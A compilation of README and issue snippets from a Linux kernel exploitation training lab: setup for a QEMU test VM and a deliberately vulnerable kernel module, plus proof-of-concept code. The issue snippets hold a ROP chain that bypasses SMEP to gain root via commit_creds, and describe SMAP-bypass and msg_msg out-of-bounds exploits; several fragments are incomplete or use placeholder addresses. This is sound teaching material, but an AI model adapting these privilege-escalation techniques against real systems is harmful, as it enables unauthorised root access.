### Install Build Tools on Ubuntu

Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md

Installs the tools needed to build the kernel module and the other binaries on Ubuntu Server 24.04.

```bash
sudo apt install git make gcc
```

--------------------------------

### Start QEMU Virtual Machine for Kernel Testing

Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md

Launches a QEMU virtual machine with 2G of RAM, two vCPUs, a serial console on `ttyS0` and user-mode networking that forwards host port 10021 to the guest's SSH port 22 (`-s` additionally exposes the gdb stub on TCP port 1234). The freshly built `bzImage` is booted directly, with the rootfs image attached as `/dev/sda`.

```bash
qemu-system-x86_64 \
  -s \
  -enable-kvm \
  -m 2G \
  -cpu qemu64 \
  -smp 2 \
  -drive file=~/rootfs.img \
  -net user,host=10.0.2.10,hostfwd=tcp:127.0.0.1:10021-:22 \
  -net nic,model=e1000 \
  -nographic \
  -no-reboot \
  -kernel ~/linux/arch/x86/boot/bzImage \
  -append "console=ttyS0 earlyprintk=serial net.ifnames=0 root=/dev/sda" \
  -pidfile vm.pid \
  2>&1 | tee vm.log
```

--------------------------------

### Create Debian Bookworm Rootfs Image

Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md

Generates a basic Debian Bookworm root filesystem image with debootstrap for the virtual machine.

```bash
cd ~ && touch rootfs.img
dd if=/dev/zero of=rootfs.img bs=1M count=2048
mkfs.ext4 rootfs.img
sudo mkdir /mnt/rootfs
sudo mount rootfs.img /mnt/rootfs
sudo apt install debian-archive-keyring
sudo debootstrap bookworm /mnt/rootfs http://deb.debian.org/debian/
# chroot into /mnt/rootfs and make additional tweaks, like adding a user
sudo umount /mnt/rootfs
```

--------------------------------

### Install and Test Kernel Module

Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md

Loads the compiled kernel module and runs a basic test to verify its functionality.
```bash
sudo insmod drill_mod.ko
./drill_test
```

--------------------------------

### Install Kernel Module in VM

Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md

Loads the `drill_mod.ko` kernel module into the running virtual machine's kernel using `insmod`. Because it is an out-of-tree module, loading it taints the kernel.

```bash
user@hostname ~> sudo insmod drill_mod.ko
[sudo] password for user:
[ 23.925524] drill_mod: loading out-of-tree module taints kernel.
[ 23.928631] drill: start hacking
user@hostname ~>
```

--------------------------------

### Install Linux Kernel Build Dependencies

Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md

Installs the packages required for compiling the Linux kernel on Debian-based systems.

```bash
sudo apt install git make gcc flex bison libncurses5-dev libssl-dev libelf-dev dwarves xz-utils zstd
```

--------------------------------

### Kernel Exploit PoC Setup and ROP Chain

Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/issues.md

This diff turns the `drill_uaf_callback.c` PoC into `drill_uaf_callback_rop_smep.c`. Instead of calling `commit_creds(prepare_kernel_cred(&init_task))` from a userspace function, the new version maps a fake stack at a fixed userspace address and fills it with a ROP chain that calls `prepare_kernel_cred()` and `commit_creds()`, so the control flow hijack works with SMEP enabled. The updated header comment lists the prerequisites: QEMU with `-cpu qemu64,+smep,-smap`, the kernel booted with `pti=off nokaslr`, kernel v6.12.7 (commit 319addc2ad901dac4d6cc931d77ef35073e0942f), the listed differences from `defconfig`, and gcc 11.4.0. The symbol and gadget addresses come from `System.map` and are specific to that build.

```diff
--- drill_uaf_callback.c	2025-04-28 12:42:18.516016046 +1000
+++ drill_uaf_callback_rop_smep.c	2025-04-28 16:03:49.757000192 +1000
@@ -9,10 +9,24 @@ * - CONFIG_RANDOM_KMALLOC_CACHES * * 2) Disable mitigations: - * - run qemu with "-cpu qemu64,-smep,-smap". + * - run qemu with "-cpu qemu64,+smep,-smap". * - run the kernel with "pti=off nokaslr". * - * This PoC performs control flow hijack and gains LPE. + * 3) Check your kernel version: + * - head at v6.12.7 tag, + * 319addc2ad901dac4d6cc931d77ef35073e0942f + * + * 4) Difference from `defconfig`: + * - CONFIG_CONFIGFS_FS=y + * - CONFIG_SECURITYFS=y + * - CONFIG_DEBUG_INFO=y + * - CONFIG_DEBUG_INFO_DWARF4=y + * - CONFIG_DEBUG_INFO_COMPRESSED_NONE=y + * - CONFIG_GDB_SCRIPTS=y + * + * 5) Compiler is gcc, version 11.4.0 + * + * This PoC performs control flow hijack and gains LPE and SMEP buypass via ROP/JOP. */ #define _GNU_SOURCE 
@@ -29,28 +43,74 @@ #include #include "drill.h" +/* payload mmap() defines */ #define MMAP_SZ 0x1000 #define PAYLOAD_SZ 95 +/* fake stack mmap() defines */ +#define FAKE_STACK_ADDR 0xf6000000 /* STACKPIVOT_GADGET_PTR changes rsp to this value */ +#define PAGE_SIZE 0x1000 +#define MMAP_ADDR (FAKE_STACK_ADDR - PAGE_SIZE) +#define MMAP_SIZE (PAGE_SIZE * 2) + /* ============================== Kernel stuff ============================== */ /* Addresses from System.map (no KASLR) */ -#define COMMIT_CREDS_PTR 0xffffffff81123b20lu -#define PREPARE_KERNEL_CRED_PTR 0xffffffff81124080lu -#define INIT_TASK_PTR 0xffffffff83411080lu - typedef int __attribute__((regparm(3))) (*_commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (*_prepare_kernel_cred)(unsigned long cred); +/* Addresses from System.map (no KASLR) */ +#define COMMIT_CREDS_PTR 0xffffffff810c0960UL +#define PREPARE_KERNEL_CRED_PTR 0xffffffff810c0bf0UL +#define INIT_TASK_PTR 0xffffffff82a0c940UL + +/* ROP gadgets */ +#define STACKPIVOT_GADGET_PTR 0xffffffff81c1349bUL /* mov esp, 0xf6000000 ; ret */ +#define POP_RDI 0xffffffff810862ccUL /* pop rdi ; ret */ +#define POP_RAX 0xffffffff810604c4UL /* pop rax ; ret */ +#define JMP_RAX 0xffffffff810372abUL /* jmp rax */ +#define PUSH_RAX_POP_RSI 0xffffffff81d1da58UL /* push rax ; pop rsi ; ret */ +#define PUSH_RSI_POP_RDI_JMP 0xffffffff810f1a26UL /* push rsi ; pop rdi ; add eax, dword ptr [rax] ; jmp 0xffffffff810f19de */ +#define XCHG_RAX_RBP 0xffffffff81633c34UL /* xchg rax, rbp ; ret */ +#define SUB_RAX_RDI 0xffffffff81f2ec90UL /* sub rax, rdi ; ret */ +#define PUSH_RAX_POP_RSP_DEC_PTR_RAX 0xffffffff81d186f5UL /* push rax ; pop rsp ; dec DWORD PTR [rax-0x7d] ; ret */ -_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS_PTR; -_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED_PTR; + +/* ========================================================================== */ -void root_it(void) +void 
build_stack() { -commit_creds(prepare_kernel_cred(INIT_TASK_PTR)); + char *mmaped_area = mmap((void *)MMAP_ADDR, MMAP_SIZE, PROT_WRITE, + MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0); + unsigned long *fake_stack = NULL; + unsigned long off = 0; + + if (mmaped_area < 0) { + perror("[-] mmap"); + exit(EXIT_FAILURE); + } + if (mmaped_area != (void *)MMAP_ADDR) { + printf("[-] mmaped to wrong addr: %p\n", mmaped_area); + exit(EXIT_FAILURE); + } + printf("[+] mmaped_area is at %p\n", mmaped_area); + memset(mmaped_area, 0, MMAP_SIZE); + + fake_stack = (unsigned long *)(mmaped_area + PAGE_SIZE); + printf("[+] fake stack for the ROP chain is at %p\n", fake_stack); + + fake_stack[off++] = POP_RDI; + fake_stack[off++] = INIT_TASK_PTR; /* passed as the 1st argument of the prepare_kernel_cred() */ + fake_stack[off++] = POP_RAX; + fake_stack[off++] = PREPARE_KERNEL_CRED_PTR; + fake_stack[off++] = JMP_RAX; /* executes prepare_kernel_cred(&init_task) */ + fake_stack[off++] = PUSH_RAX_POP_RSI; /* the value returned by prepare_kernel_cred is */ + fake_stack[off++] = PUSH_RSI_POP_RDI_JMP; /* passed to RDI 1st argument of the function */ + fake_stack[off++] = 0xdeadfeed; /* previous gadget adds 8 to rsp due to JMP */ + fake_stack[off++] = POP_RAX; + fake_stack[off++] = COMMIT_CREDS_PTR; } /* ========================================================================== */
```

--------------------------------

### Payload Preparation and Execution

Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/issues.md

This `main()` from the same PR pins the CPU, builds the fake stack, maps the spray data and triggers the callback through `setxattr()` and the drill `act()` helper. The comment explains why `sched_yield()` is called before the final action: without it the process could be preempted and the chain would run from a task where the fake stack is not mapped.
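Review bot: in the `drill_uaf_callback_rop_smep.c` diff above, `build_stack()` tests `if (mmaped_area < 0)`, which compares a `char *` against zero and never catches a failed `mmap()`; the call reports failure by returning `MAP_FAILED`, so the check should read `if (mmaped_area == MAP_FAILED)`. The rewritten header comment also has a typo: "buypass" should be "bypass".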
```c
#define MMAP_SZ 0x1000
#define PAYLOAD_SZ 0x100
#define DRILL_ACT_CALLBACK 0x10

int main(void)
{
	void *spray_data;
	int act_fd;
	int ret;

	/*
	 * Prepare
	 */
	do_cpu_pinning();
	build_stack();

	spray_data = mmap(NULL, MMAP_SZ, PROT_READ | PROT_WRITE,
			  MAP_SHARED | MAP_ANONYMOUS, -1, 0);
	if (spray_data == MAP_FAILED) {
		perror("mmap");
		return EXIT_FAILURE;
	}

	/*
	 * Trigger
	 */
	printf("[+] spray data at %p\n", spray_data);
	ret = setxattr("./", "foobar", spray_data, PAYLOAD_SZ, 0);
	printf("setxattr returned %d\n", ret);

	/*
	 * While debugging a ROP chain, I noticed repeated double_fault errors.
	 * It turned out that by this time the scheduler slot was running out
	 * and our process was being preempted by a new process
	 * where the 'fake_stack' was not mmaped.
	 *
	 * This function frees the current CPU for other tasks,
	 * effectively allowing the ROP chain (which executes after the second callback)
	 * to execute from the new scheduler slot.
	 */
	sched_yield(); /* the snippet had "int sched_yield();", a declaration that never yields */

	if (act(act_fd, DRILL_ACT_CALLBACK, 3, NULL) == EXIT_FAILURE)
		goto end;
	printf("[+] DRILL_ACT_CALLBACK\n");

end:
	return ret;
}
```

--------------------------------

### Create Default Kernel Configuration

Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md

Generates the default configuration file for the Linux kernel.

```bash
make defconfig
```

--------------------------------

### Compile Kernel Module and Binaries

Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md

Builds the `drill_mod.ko` kernel module and the associated userspace utilities.

```bash
cd kernel-hack-drill
make
```

--------------------------------

### CPU Pinning and Callback Assignment

Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/issues.md

Despite its name, the fragment of `do_cpu_pinning()` shown here only maps and fills a payload buffer and stores the stack-pivot gadget address in `item->callback`; it is used together with the payload preparation above. Note that in this extracted fragment `item` is still `NULL` when it is dereferenced and `STACKPIVOT_GADGET_PTR` is a placeholder value, so the snippet is not complete as shown.
```c
#define STACKPIVOT_GADGET_PTR 0x4141414141414141

int do_cpu_pinning(void)
{
	struct item *item = NULL;
	void *p = NULL;
	size_t size = 0x100;

	p = mmap(NULL, size, PROT_READ | PROT_WRITE,
		 MAP_SHARED | MAP_ANONYMOUS, -1, 0);
	if (p == MAP_FAILED)
		return EXIT_FAILURE;

	memset(p, 0x41, size);
	item->callback = (void (*)(void))STACKPIVOT_GADGET_PTR;

	printf("[+] payload:\n");
	printf("\tstart at %p\n", p);

	return EXIT_SUCCESS;
}
```

--------------------------------

### Build the Linux Kernel

Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md

Compiles the Linux kernel using all available processor cores for a faster build.

```bash
make -j`nproc`
```

--------------------------------

### Enable Kernel Configuration Options

Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md

Enables `CONFIG_CONFIGFS_FS` and `CONFIG_SECURITYFS`, which the Debian-based guest needs on top of `defconfig`.

```bash
./scripts/config -e CONFIG_CONFIGFS_FS -e CONFIG_SECURITYFS
```

--------------------------------

### Run Kernel Module Tests

Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md

Executes the test suite for the `drill_mod.ko` module to verify its functionality and error handling.

```bash
./drill_test
```

--------------------------------

### Kernel Hardening Configuration for Ret2usr Exploit

Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md

Lists the kernel configuration options that must be left out and the QEMU and kernel boot parameters that disable the hardening mechanisms (SMEP, SMAP, KPTI, KASLR) for testing ret2usr-style PoCs.

```text
 * 1) Compile the Linux kernel without:
 *     - CONFIG_SLAB_BUCKETS
 *     - CONFIG_RANDOM_KMALLOC_CACHES
 *
 * 2) Disable mitigations:
 *     - run qemu with "-cpu qemu64,-smep,-smap".
 *     - run the kernel with "pti=off nokaslr".
```

--------------------------------

### Troubleshooting Kernel Module Version Mismatch

Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md

Shows the `Invalid module format` error that `insmod` reports when the module was built against a different kernel version than the one it is being loaded into; the module has to be rebuilt against the running kernel's source tree.

```bash
user@hostname ~> sudo insmod drill.ko
insmod: ERROR: could not insert module drill.ko: Invalid module format
user@hostname [1]>
```

--------------------------------

### Transfer Kernel Module to VM via SCP

Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md

Copies the `kernel-hack-drill` directory, including the compiled `drill_mod.ko`, from the host into the virtual machine over SCP through the forwarded SSH port.

```bash
scp -r -P 10021 kernel-hack-drill user@localhost:/home/user/.
```

--------------------------------

### Run Null Dereference Exploit

Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/issues.md

Output of running the null dereference PoC: it prints the initial user ID, the payload address and the process memory map, then fails with a segmentation fault.

```bash
drill@syzkaller:~$ ./drill_exploit_nullderef
begin as: uid=1000, euid=1000
payload address: 0x55b911775349
[+] /proc/$PPID/maps:
00010000-00011000 rw-p 00000000 00:00 0
Segmentation fault
```

--------------------------------

### Build Kernel Module with Custom Kernel Path

Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md

Compiles the `drill_mod.ko` kernel module against a specific kernel source tree, given through the `KPATH` environment variable.

```bash
cd kernel-hack-drill
KPATH=~/linux/ make
```

--------------------------------

### Clone Kernel Hack Drill Repository

Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md

Obtains the source code for the kernel exploitation experiments.
```bash
git clone https://github.com/a13xp0p0v/kernel-hack-drill.git
```

--------------------------------

### Clean up temporary files in kernel exploit PoCs

Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/issues.md

Shows the output of `make clean` followed by `git status`: the temporary files created by the PoCs (`foobar`, `forftok1`) are left behind as untracked files.

```bash
$ make clean
[...]
$ git status
On branch master
Your branch is up to date with 'origin/master'.

Untracked files:
  (use "git add ..." to include in what will be committed)
	foobar
	forftok1

nothing added to commit but untracked files present (use "git add" to track)
$
```

--------------------------------

### Clone Linux Kernel Source Code

Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md

Fetches the Linux kernel source code from the official Git repository.

```bash
git clone https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git ~/linux
```

--------------------------------

### Kernel Stack Manipulation with JMP Instruction

Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/issues.md

This fragment of `build_stack()` shows the tail of the fake stack: after the `JMP_RAX` gadget runs the credential functions, the remaining gadgets recompute the original RSP from RBP and switch back to it so the kernel continues legitimate execution. The `#define` values in this extracted fragment are placeholders, not real kernel addresses.
```c
#define JMP_RAX 0xffffe000
#define XCHG_RAX_RBP 0x1f0f
#define POP_RDI 0x5f
#define SUB_RAX_RDI 0x29f7
#define PUSH_RAX_POP_RSP_DEC_PTR_RAX 0x4889f0

void build_stack()
{
	unsigned long fake_stack[10];
	int off = 0;

	fake_stack[off++] = JMP_RAX;                      /* executes commit_creds(prepare_kernel_cred(&init_task)) */
	fake_stack[off++] = XCHG_RAX_RBP;                 /* RBP contains a pointer */
	fake_stack[off++] = POP_RDI;                      /* that differs by 0x37 */
	fake_stack[off++] = 0x37;                         /* from the old RSP */
	fake_stack[off++] = SUB_RAX_RDI;
	fake_stack[off++] = PUSH_RAX_POP_RSP_DEC_PTR_RAX; /* restore the RSP and continue legitimate execution */
}
```

--------------------------------

### SMAP bypass and LPE via core_pattern overwrite

Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/issues.md

This PoC implements a SMAP bypass using two stack pivots in kernel space, so the ROP/JOP chain never has to live in userspace memory. The payload overwrites `core_pattern` for local privilege escalation (LPE). The text below is the PR author's own description.

```text
SMAP bypass is implemented via two stack-based pivots in kernel space, allowing execution of ROP/JOP stored in `pt_regs` and `drill_item_t`. The payload overwrites `core_pattern`, resulting in a local privilege escalation (LPE).

I also thought about `goto end`, and I have to edit this label a bit because of my ROP/JOP chain, which forces the primary thread to sleep. Can we discuss this and other parts of the code to refactor? Will do my best.
```

--------------------------------

### Fix shm_open build error on older Debian

Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/issues.md

Build command that fixes an undefined reference to `shm_open` on older Debian systems, where the symbol lives in `librt`: the binary is linked against `librt` and `pthread` explicitly.
```bash
gcc drill_uaf_w_pte.c -Wall -static -o drill_uaf_w_pte -lrt -pthread
```

--------------------------------

### Expected Test Output

Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md

A successful `drill_test` run prints these lines, confirming that the module's normal functionality and its error handling both work.

```text
[+] drill_act is opened
[...]
[+] looks like normal functionality in drill.ko works fine
[...]
[+] looks like error handling in drill.ko works fine
```

--------------------------------

### Successful Kernel Module Compilation

Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/issues.md

Output after applying the fix: the kernel module now compiles with `LLVM=1`, confirming that the variable declaration issue has been resolved.

```bash
d@c553020e9dfc:/src/drill/kernel-hack-drill$ KPATH=../. make LLVM=1
gcc drill_test.c -Wall -static -o drill_test
gcc drill_uaf_callback.c -Wall -static -o drill_uaf_callback
gcc drill_uaf_callback_rop_smep.c -Wall -static -o drill_uaf_callback_rop_smep
gcc drill_uaf_w_msg_msg.c -Wall -static -o drill_uaf_w_msg_msg
gcc drill_uaf_w_pipe_buffer.c -Wall -static -o drill_uaf_w_pipe_buffer
gcc drill_uaf_w_pte.c -Wall -static -o drill_uaf_w_pte
gcc drill_uaf_w_pud.c -Wall -static -o drill_uaf_w_pud
make -C ../. M=/src/drill/kernel-hack-drill modules
make[1]: Entering directory '/src/drill'
  CC [M]  /src/drill/kernel-hack-drill/drill_mod.o
  MODPOST /src/drill/kernel-hack-drill/Module.symvers
  CC [M]  /src/drill/kernel-hack-drill/drill_mod.mod.o
  LD [M]  /src/drill/kernel-hack-drill/drill_mod.ko
make[1]: Leaving directory '/src/drill'
d@c553020e9dfc:/src/drill/kernel-hack-drill$
```

--------------------------------

### Kernel Module Compilation Errors

Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/issues.md

Compilation errors encountered when building the kernel module with `clang` (`LLVM=1`).
Clang rejects the declarations placed directly after the `case DRILL_ACT_SAVE_VAL:` label in `drill_mod.c`, and every later use of `val` then fails as an undeclared identifier.

```bash
d@c553020e9dfc:/src/drill/kernel-hack-drill$ git status
On branch master
Your branch is up to date with 'origin/master'.

nothing to commit, working tree clean
d@c553020e9dfc:/src/drill/kernel-hack-drill$ KPATH=../. make LLVM=1 -j16
gcc drill_test.c -Wall -static -o drill_test
gcc drill_uaf_callback.c -Wall -static -o drill_uaf_callback
gcc drill_uaf_callback_rop_smep.c -Wall -static -o drill_uaf_callback_rop_smep
gcc drill_uaf_w_msg_msg.c -Wall -static -o drill_uaf_w_msg_msg
gcc drill_uaf_w_pipe_buffer.c -Wall -static -o drill_uaf_w_pipe_buffer
gcc drill_uaf_w_pte.c -Wall -static -o drill_uaf_w_pte
gcc drill_uaf_w_pud.c -Wall -static -o drill_uaf_w_pud
make -C ../. M=/src/drill/kernel-hack-drill modules
make[1]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.
make[1]: Entering directory '/src/drill'
  CC [M]  /src/drill/kernel-hack-drill/drill_mod.o
/src/drill/kernel-hack-drill/drill_mod.c:70:3: error: expected expression
                unsigned long val = 0;
                ^
/src/drill/kernel-hack-drill/drill_mod.c:84:32: error: use of undeclared identifier 'val'
                ret = kstrtoul(arg2_str, 0, &val);
                                             ^
/src/drill/kernel-hack-drill/drill_mod.c:97:42: error: use of undeclared identifier 'val'
                                sizeof(struct drill_item_t) - sizeof(val))
                                                                     ^
/src/drill/kernel-hack-drill/drill_mod.c:104:6: error: use of undeclared identifier 'val'
                        val, n, (unsigned long)drill.items[n],
                        ^
/src/drill/kernel-hack-drill/drill_mod.c:106:16: error: use of undeclared identifier 'val'
                *data_addr = val; /* No check, BAD BAD BAD */
                             ^
/src/drill/kernel-hack-drill/drill_mod.c:71:17: warning: mixing declarations and code is a C99 extension [-Wdeclaration-after-statement]
                unsigned long offset = 0;
                              ^
1 warning and 5 errors generated.
make[2]: *** [scripts/Makefile.build:280: /src/drill/kernel-hack-drill/drill_mod.o] Error 1
make[1]: *** [Makefile:1822: /src/drill/kernel-hack-drill] Error 2
make[1]: Leaving directory '/src/drill'
make: *** [Makefile:16: all] Error 2
d@c553020e9dfc:/src/drill/kernel-hack-drill$
```

--------------------------------

### Fix for Kernel Module Compilation Errors

Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/issues.md

The diff that fixes the compilation errors in `drill_mod.c`: the three variable declarations are moved from the `case` label to the top of `drill_act_exec()`, which is valid in every C standard the kernel supports and resolves the undeclared identifier errors.

```diff
d@c553020e9dfc:/src/drill/kernel-hack-drill$ git diff HEAD~1
diff --git a/drill_mod.c b/drill_mod.c
index da17f7b..084b64b 100644
--- a/drill_mod.c
+++ b/drill_mod.c
@@ -27,6 +27,9 @@ static int drill_act_exec(long act, { int ret = 0; unsigned long n = 0; + unsigned long val = 0; + unsigned long offset = 0; + unsigned long *data_addr = NULL; if (!arg1_str) { pr_err("drill: item number is missing\n");
@@ -67,10 +70,6 @@ static int drill_act_exec(long act, break; case DRILL_ACT_SAVE_VAL: - unsigned long val = 0; - unsigned long offset = 0; - unsigned long *data_addr = NULL; - if (!arg2_str) { pr_err("drill: save_val: missing value\n"); return -EINVAL;
d@c553020e9dfc:/src/drill/kernel-hack-drill$
```

--------------------------------

### New exploit for msg_msg->next corruption

Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/issues.md

This PR adds an out-of-bounds write PoC that corrupts `msg_msg->next`, leaving a dangling reference to the next `msg_msg`; the victim `msg_msg` is then reclaimed with a fake one built through `sk_buff.data`, which enables out-of-bounds reading of kernel memory. The text below is the PR author's own summary.

```text
1. tiny modification for `drill_mod.c` allowing OOBW
2. small change to `drill_test.c`
3. a basic out-of-bounds write exploit that corrupts `msg_msg->next`, causing a dangling reference to the next `msg_msg`; it is used to reclaim the victim `msg_msg` with a *fake* `msg_msg` created via `sk_buff.data`, enabling out-of-bounds reading of kernel memory
```
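Review bot: in the `drill_mod.c` diff above, hoisting `val`, `offset` and `data_addr` to the top of `drill_act_exec()` is the right fix for clang's `expected expression` error: before C23 a `case` label must be followed by a statement, not a declaration, and the `-Wdeclaration-after-statement` warning on line 71 had the same root cause. If the variables should stay scoped to `DRILL_ACT_SAVE_VAL`, the alternative is to wrap that case body in braces (`case DRILL_ACT_SAVE_VAL: {` ... `}`), which both gcc and clang accept.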